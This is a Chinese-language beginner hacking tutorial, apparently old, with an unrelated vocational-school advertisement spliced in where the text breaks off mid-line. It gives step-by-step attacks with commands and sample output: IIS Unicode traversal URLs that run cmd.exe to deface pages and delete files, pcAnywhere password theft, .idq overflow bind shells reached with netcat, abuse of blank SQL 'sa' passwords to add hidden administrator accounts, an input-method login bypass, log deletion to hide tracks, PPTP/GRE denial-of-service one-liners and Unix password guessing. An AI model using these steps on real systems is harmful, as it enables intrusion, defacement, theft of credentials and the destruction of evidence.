菜鳥(niǎo)入門(mén)速成教程-流行的漏洞入侵
終于決定要寫(xiě)下這份速成教材了,好讓一些正準(zhǔn)備步入黑客殿堂的朋友和一些正在步入黑客殿堂的朋友可以很快的找到感覺(jué).因?yàn)槭撬俪伤岳锩娴囊恍├碚撋系臇|東會(huì)被X掉,大家如果要學(xué)的話(huà)可以找書(shū)看看,以下都是攻擊的步驟(不準(zhǔn)用在國(guó)內(nèi)的機(jī)子上)
1 UNICODE漏洞
這是老漏洞了,但對(duì)于新手來(lái)說(shuō)很好用,而且事實(shí)證明現(xiàn)在仍有很多的機(jī)子有這種漏洞,OK我們開(kāi)始
先用掃描器掃到有UNICODE漏洞的機(jī)子,(注意漏洞的編碼方式有所不同有的是..%CI%IC.. 用的是..%C0%AF..當(dāng)然還有其它的方式, 具體根據(jù)你的掃描器掃出的結(jié)果為標(biāo)準(zhǔn)
我們?cè)诹饔[器(IE)的地址欄中輸入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir
這時(shí)你可以看到它的系統(tǒng)目錄但我們要的是主頁(yè)面放置的目錄
在輸入
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/inetpub/wwwroot
看到了吧,目錄中的INDEX.HTML INDEX.ASP DEFAULT.ASP DEFAULT.ASP等等就是它的主頁(yè)面,
我們來(lái)?yè)Q它的頁(yè)面
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe
http://ip/scripts/ccc.exe?/c+echo+Hacked+by+KAWEN+ >+c:/inetpub/wwwroot/default.asp
OK
成功了,此時(shí)它的主頁(yè)面被換成了HACKED BY KAWEN
大家可以看看
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe 執(zhí)行后是復(fù)制,如果換成這個(gè)呢
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+DEL+c:/winnt/system32/cmd.exe
沒(méi)錯(cuò)就是刪除了
知道怎么做了吧
呵呵
2利用PCANWHERE攻擊網(wǎng)站
現(xiàn)在開(kāi)始入正題了,剛才只是熱身
由于NT的機(jī)器一般使用PCAnyWhere進(jìn)行遠(yuǎn)程管理,因此如果能夠得到PCAnyWhere遠(yuǎn)程連接的帳號(hào)和密碼,那么就能遠(yuǎn)程連接到主機(jī)。 ( http://fxyong.3322.net/getpwd.zip )便可以取得帳號(hào)和密碼
Telnet IP 5631
我們可以看看PCANYWHERE開(kāi)了沒(méi)
使用Unicode漏洞+ PCanyWhere密碼查看工具
首先我們要DOWN一個(gè)可以破 Pcanywhere的工具
http://www.symantec.com/
OK 我們現(xiàn)在要找到主機(jī)上的*.CIF文件
在IE中輸入 http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+dir c:/*.cif /s
一般Citempl.cif為系統(tǒng)默認(rèn)的密碼文件,因此我們需要SA.CIF文件。 復(fù)制該文件到網(wǎng)站目錄下。
需要知道網(wǎng)站目錄,可以通過(guò)ida,idq漏洞進(jìn)行得到,也可以去尋找網(wǎng)站中的一個(gè)圖片文件,比如Tscontent.gif文件,然后去查找該文件:使用命令 dir c:/ Tscontent.gif /s
比如網(wǎng)站目錄為c:/inetpub/wwwroot/ 一般都有是啦 呵呵
密碼文件所在目錄:c:/Program Files/pcANYWHERE/DATA
下面執(zhí)行Copy命令:
http://x.x.x.x/scripts/ ..%c1%1c../winnt/system32/cmd.exe?/c+copy c:/Program Files/pcANYWHERE/DATA/SA.CGI c:/inetpub/wwwroot/
顯示1 file(s) copied,就表示復(fù)制成功了。
使用IE下載該文件
使用 http://IP/sa.cif 就可以下載該文件了。
使用PCanyWhere密碼查看工具得到用戶(hù)名和密碼
3利用.idq漏洞
為了方便大家可以看懂下面說(shuō)的是什么可以先到這里來(lái)看看
http://snake12.top263.net/IISOverflow/IISOverflow.htm
一共有兩個(gè)版本.一個(gè)是GUI版本.一個(gè)是命令行版本.
這里我們來(lái)說(shuō)CUI版本,反正都差不多了,關(guān)鍵是要多試
首先我們要找到有.IDQ漏洞的機(jī)子,可以用流光掃一下
運(yùn)行軟件
在被攻擊IP地址后面寫(xiě)上對(duì)方的IP.端口號(hào)一般不需要改動(dòng).
左面選擇操作系統(tǒng)類(lèi)型.先選擇IIS5 English Win2k Sp0吧~
軟件的默認(rèn)綁定CMD.EXE的端口是813.不改了.用默認(rèn)吧~~~
點(diǎn)擊IDQ溢出~~OK~~出現(xiàn)發(fā)送Shellcode成功的提示了.
接著我們用NC,你可以到到盟下載 WWW.CNHONKER.COM
C:/>nc -vv XXX.XXX.XXX.XXX 813
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:/WINNT/system32>
OK!!!上來(lái)了
你現(xiàn)在有SYSTEM權(quán)限,不錯(cuò)吧,該做什么不用我教了吧,比如為自已留下個(gè)后門(mén)
net user hacker password /add '添加一給名為hacker,密碼為passwod的用戶(hù)!
net localgroup administrators hacker /add ' 把剛才創(chuàng)建的用戶(hù)加入 Admnistrators組
OK我們?cè)趤?lái)看看DOS版本
下載軟件后會(huì)有個(gè)運(yùn)行文件,它太長(zhǎng)了,將它必名為KAWEN
D:/>KAWEN
運(yùn)行參數(shù): 操作系統(tǒng)類(lèi)型 目的地址 web端口 溢出端口
支持的操作系統(tǒng) 類(lèi)型: ----
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --not support -- IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --not support -- IIS5 Japanese Win2k Sp2
D:/>KAWEN 3 XXX.XXX.XXX.XXX80 456
連接目的機(jī)器 XXX.XXX.XXX.XXX:80 OK.
發(fā)送shellcode 到 XXX.XXX.XXX.XXX:80 OK
現(xiàn)在,你可以 連接 該主機(jī)的 端口 456了,good luck.!
開(kāi)始吧
D:/>nc -vv XXX.XXX.XXX.XXX 456
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused
sent 0, rcvd 0: NOTSOCK
沒(méi)成功.試試sp1.
D:/>KAWEN 4 XXX.XXX.XXX.XXX 80 888
連接目的機(jī)器 XXX.XXX.XXX.XXX:80 OK.
發(fā)送shellcode 到 XXX.XXX.XXX.XXX:80 OK
現(xiàn)在,你可以 連接 該主機(jī)的 端口 888了,good luck.!
D:/>nc -vv XXX.XXX.XXX.XXX 888
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:/WINNT/system32>
看看我們又成功了
4 SQL攻擊網(wǎng)站
這個(gè)也很方便,呵呵,上次在對(duì)美國(guó)大戰(zhàn)中也有不少兄弟是用這種方法的,來(lái)看看吧
我們需要小榕的流光作為武器,到WWW.NETEYES.COM去DOWN一個(gè)
運(yùn)行流光然后按快捷鍵ctrl+r搜索!
選擇aql!輸入開(kāi)始和結(jié)束的IP!掃描吧!到搜索結(jié)束!察看流光 下面的視圖!格式如下:
用戶(hù)名 密碼 地址
sa 211.21.220.28
sa 211.21.220.26
sa 211.21.220.197
其中《null》表示密碼為空!
雙擊其中一項(xiàng)(或在工具……>SQL登錄)!會(huì)彈出一個(gè)dos窗口!如果過(guò)一會(huì)該窗口消失!沒(méi)戲了!對(duì)方不支持遠(yuǎn)程登錄!在換一個(gè)!如果過(guò)一會(huì)出現(xiàn)如下的字樣:
SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas!
Connect to 211.21.220.28 MSSQL Server Success, Type Command in Prompt.
SQLCmd>
那表示已經(jīng)登錄上了對(duì)方的主機(jī)!然后
SQLCmd>net user ‘察看用戶(hù)!如果不能察看,說(shuō)明sa權(quán)限不夠,那也沒(méi)戲,換其他的方法!或是走人!有時(shí)用net user察看成功!再試試
SQLCmd>net user administrator ’察看Admin的情況(可知是否在線(xiàn))如果失敗,撤退吧,
沒(méi)戲,換方法! 沒(méi)有權(quán)限,但是如果可以的話(huà)
下一步:
SQLCmd>net user hacker password /add '添加一給名為hacker,密碼為passwod的用戶(hù)!
SQLCmd>net localgroup administrators hacker /add ' 把剛才創(chuàng)建的用戶(hù)加入 Admnistrators組
好了,告一段落,下面啟動(dòng)DOS用剛創(chuàng)建的用戶(hù)進(jìn)行ipc$
net use //*.*.*.*/ipc$ "password" /user:"hacker" '很熟悉吧!IPC$開(kāi)始了!
執(zhí)行成功的話(huà)!搞吧!刪除!上傳!下載!要什么!隨你!
例如copy c:/hacker/index.htm //IP/c$/inetpub/wwwroot/default.htm (IP為它的IP)
干什么,換他的主頁(yè)啊!呵呵!
據(jù)我的實(shí)踐!針對(duì)臺(tái)灣的主機(jī)!另一方法是用剛創(chuàng)建的用戶(hù)名和密碼用CuteFtp登錄!就象管理自己的站點(diǎn)一樣!任意刪除創(chuàng)建Html頁(yè)面!此方法對(duì)美國(guó)的主機(jī)沒(méi)有成功過(guò)!我都是IPC$搞定的!
以上的原理是用SQL開(kāi)門(mén)!用IPC$進(jìn)門(mén)做作administrator可以作的事!但對(duì)于SQL主機(jī)!Administrator一般沒(méi)有對(duì)數(shù)據(jù)庫(kù)刪除或創(chuàng)建的權(quán)限!此時(shí)可以down下他的sam文件解密(怎么DOWN?暈,看看我在上面UNICODE中寫(xiě)的教材)!默認(rèn)用戶(hù)名SQLAgentCmdExec,然后用天行的SQlBrowse登錄就可以對(duì)數(shù)據(jù)庫(kù)任意操作了!
5 利用輸入法漏洞
要說(shuō)老美真不是東西,這么大個(gè)洞現(xiàn)在還尚存人間,也好,大家可以練練手
1、用端口掃瞄程序掃IP的3389端口,得到xx.xx.xx.xx。
2、運(yùn)行windows2000終端客戶(hù)程序,在服務(wù)器輸入框里填入:xx.xx.xx.xx ,連接。
3、出現(xiàn)windows2000的登陸窗口,按下CTRL+SHIFT鍵,出現(xiàn)全拼輸入法。
4、在輸入法狀態(tài)條上按mouse右鍵,選擇幫助,選擇輸入指南,選擇"選項(xiàng)"按右鍵。
5、選擇"跳轉(zhuǎn)到URL",輸入:c:/winnt/system32/cmd.exe.
6、選擇"保存到磁盤(pán)"。
7、選擇目錄:c:/inetpub/scripts/
8、打開(kāi)IE,輸入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:/ (知道了吧)
9、輸入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:/inetpub/wwwroot/default.asp
還有一種方法
1.掃描 3389 port 終端服務(wù)默認(rèn);
2.用終端客戶(hù)端程序進(jìn)行連接;
3.按ctrl+shift調(diào)出全拼輸入法(其他似乎不行),點(diǎn)鼠標(biāo)右鍵(如果其幫助菜單發(fā)灰,就趕快趕下家吧,人家打補(bǔ)丁了),點(diǎn)幫助,點(diǎn)輸入法入門(mén);
4.在"選項(xiàng)"菜單上點(diǎn)右鍵--->跳轉(zhuǎn)到URL",輸入:c:/winnt/system32/cmd.exe.(如果不能確定NT系統(tǒng)目錄,則輸入:c:/ 或d:/ ……進(jìn)行查找確定);
5.選擇"保存到磁盤(pán)" 選擇目錄:c:/inetpub/scripts/,因?qū)嶋H上是對(duì)方服務(wù)器上文件自身的復(fù)制操作,所以這個(gè)過(guò)程很快就會(huì)完成;
6.打開(kāi)IE,輸入: http://ip/scripts/cmd.exe?/c dir 怎么樣?有cmd.exe文件了吧?這我們就完成了第一步;
7. http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8. http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9. http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10. http://ip/scripts/cmd.exe?/c type go.bat 看看我們的批文件內(nèi)容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"選項(xiàng)"菜單上點(diǎn)右鍵--->跳轉(zhuǎn)到URL",輸入:c:/inetpub/scripts/go.bat --->在磁盤(pán)當(dāng)前位置執(zhí)行;
12.呵呵,大功告成啦,這樣我們就激活了服務(wù)器的geust帳戶(hù),密碼為:elise,超級(jí)用戶(hù)呢! (我喜歡guest而不是建立新帳戶(hù),這樣似乎不易被發(fā)現(xiàn)些),
后一定別不記的X掉自已的腳印
del+C:/winnt/system32/logfiles/*.*
del+C:/winnt/ssytem32/config/*.evt
del+C:/winnt/system32/dtclog/*.*
del+C:/winnt/system32/*.log
del+C:/winnt/system32/*.txt
del+C:/winnt/*.txt
del+C:/winnt/*.log
6 教你DoS攻擊微軟的PPTP
呵呵,大家沒(méi)有看錯(cuò),的確是微軟的,我們先看看PPTP是個(gè)什么東東PPTP(Piont-to-point Tunneling Protocol 點(diǎn)對(duì)點(diǎn)傳輸協(xié)議)是一個(gè)用以建立VPN的網(wǎng)絡(luò)協(xié)議. 此協(xié)議需TCP(端口1723)和GRE以完成工作.
易收攻擊系統(tǒng):
* Dell PowerEdge 2200 with Intel 10/100 adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS M200s with 3Com 905B adapter, 64 MB RAM, NT Server 4.0
安全的系統(tǒng):
* HP Vectra XA with AMD PCNet integrated Ethernet, 128 MB RAM, NT Workstation 4.0
* Dell Latitude CPx with 3Com 3CCFEM656 PC Card adapter, 128 MB RAM, NT Workstation 4.0
* Generic dual PII (Asus motherboard) with 3Com 980x adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS T550 with 3Com 905C-TX adapter, 128 MB RAM, NT Workstation 4.0
如何實(shí)現(xiàn):
~~~~~~~~~
*需要的工具*
1.UNIX box(例如linux,*bsd....)
2.netcat ( http://www.l0pht.com/~weld/netcat/ )
3.apsend ( http://www.elxsi.de/ )
4.ipsend ( http://coombs.anu.edu.au/~avalon/ )
OK,這就好說(shuō)了,
我們來(lái)看它的三個(gè)BUG
1 TCP端口1723
此弱點(diǎn)只在prior至SP6的機(jī)器上有效。并不是所有的機(jī)器都存在這個(gè)漏洞;請(qǐng)?jiān)赨nix 操作系統(tǒng)內(nèi)鍵入以下:
$ nc 1723 < /dev/zero
如機(jī)器存在此漏洞, 目標(biāo)主機(jī)將在幾秒種之內(nèi)藍(lán)屏,并有如下錯(cuò)誤:
STOP 0x0A (0x0, 0x2, 0x0, 0x0) IRQL_NOT_LESS_OR_EQUAL
再次提醒,此弱點(diǎn)只對(duì)部分機(jī)器有效
2 GRE
此弱點(diǎn)對(duì)所有Service pack有效
在目標(biāo)機(jī)器上,打開(kāi)任務(wù)管理器選擇“運(yùn)行”。并打開(kāi) 一個(gè)DOS窗口(開(kāi)始-運(yùn)行-CMD).在Unix類(lèi)操作系統(tǒng)上:
$ apsend -d --protocol 47 -m 0 -q
在目標(biāo)主機(jī)上你將看到任務(wù)管理器內(nèi)內(nèi)核記憶的數(shù)字將緩慢上升。 終,這些數(shù)字將停止增加;此時(shí), CPU在一段時(shí)間內(nèi)有可能被占用。現(xiàn)在你可以試著在命令提示符后鍵入一個(gè)命令例如DIR,這時(shí)你將看 到一個(gè)信息說(shuō)提示操作系統(tǒng)已不可能完成要執(zhí)行的命令
3弱點(diǎn)三:GRE
此弱點(diǎn)同樣對(duì)所有的Service pack有效。請(qǐng)?jiān)赨nix操作系統(tǒng)上:
#!/bin/csh
foo:
ipsend -i -P gre > /dev/null
goto foo
目標(biāo)主機(jī)很快會(huì)藍(lán)屏,大概需要50個(gè)數(shù)據(jù)。
明白了吧
7 UNIX攻擊
這里為了方便我們用finger 0@ip 來(lái)找UNIX的薄弱機(jī)器
C:/>finger 0@IP
xxx.xxx.xxx.xxx]
Login Name TTY Idle When Where
daemon ??? < . . . . >
bin ??? < . . . . >
sys ??? < . . . . >
jeffrey ??? pts/0 203.66.149.11
daniel ??? 437 114cm.kcable.
jamie ??? 0 203.66.162.68
postgres ??? pts/2 203.66.162.80
nsadmin ??? 768 203.66.19.50
ho ??? 390 61.169.209.106
house18 ??? pts/1 203.66.250.1
tong ??? pts/0 210.226. 42.69
jliu ??? pts/0 203.66.52.87
ptai ??? < . . . . >
看到了嗎,這里的LOGIN下的就是我們要的用戶(hù)名了
比如jeffrey,Daniel,Jamie,postgres
下面我們就來(lái)入侵
C:/>telnet xxx.xxx.xxx.xxx
一般的情況下我們都是猜密碼,怎么猜??就是上面LOGIN下的用戶(hù)名讓它又做用戶(hù)名和密碼呀,事實(shí)上總有一些人為了方便是這么設(shè)置的
login: ptai (***輸入用戶(hù)名***)
Password: **** (***輸入密碼***)
Login incorrect (***登陸失敗***)
login: jliu
Password:
Login incorrect
$ login: tong
Password:
Last login: Mon Jul 2 13:21:55 from 210.226. 42.69 (***這個(gè)用戶(hù)上次登陸時(shí)的IP***)
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have mail. (***HOHO~登陸成功啦***)
看看這不就進(jìn)來(lái)了
$ uname –a (***查看系統(tǒng)版本和補(bǔ)丁信息***)
$ set (***查看一些系?
湖南省陽(yáng)光電子技術(shù)學(xué)校常年開(kāi)設(shè):手機(jī)維修培訓(xùn)、家電維修培訓(xùn)、電工培訓(xùn)、電腦維修培訓(xùn)、焊工培訓(xùn)--面向全國(guó)火爆招生!網(wǎng)址:http://www.hnygpx.com 報(bào)名電話(huà):13807313137)。安置就業(yè)。考試合格頒發(fā)全國(guó)通用權(quán)威證書(shū)。采用我校多年來(lái)獨(dú)創(chuàng)的“模塊教學(xué)法”,理論與實(shí)踐相結(jié)合、原理+圖紙+機(jī)器三位一體的教學(xué)模式,半天理論,半天實(shí)踐,通俗易懂,確保無(wú)任何基礎(chǔ)者也能全面掌握維修技能、成為同行業(yè)中的佼佼者。工作(一期不會(huì),免費(fèi)學(xué)會(huì)為止)。